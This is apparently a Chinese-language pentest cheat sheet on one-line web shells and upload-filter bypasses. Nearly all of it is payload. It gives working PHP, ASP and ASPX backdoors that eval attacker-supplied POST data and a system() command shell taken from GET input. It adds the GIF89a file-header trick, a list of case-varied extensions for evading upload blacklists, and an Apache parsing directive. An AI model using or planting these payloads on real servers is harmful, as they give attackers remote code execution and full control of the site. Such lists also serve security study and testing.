一句话木马与文件头过滤

一句话木马

PHP 一句话木马

<?php @eval($_POST['pass']);?>

<?php eval($_POST[aaa]) ?>

<?=eval($_POST['a']);?>  // 短标签绕过 PHP

ASP 一句话木马

<%eval request ("pass")%>

ASPX 一句话木马

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

PHP 另一种形式

<script language="php">eval($_POST['mochu7']);</script>

文件头过滤

GIF89a

在文件开头添加 GIF89a 可以绕过一些文件头检测。

可执行命令一句话

<pre> 
<body>
<? @system($_GET["cc"]); ?>
</body> 
</pre>

运行 HTML

文件后缀

以下是一些常见的文件后缀，可以用于绕过文件上传检测：

".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf"

PHP 解析配置

PHP 文件需要在 Apache 的 httpd.conf 中有如下配置代码，才能正确解析：

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

如果没有配置，访问时将会显示空白页。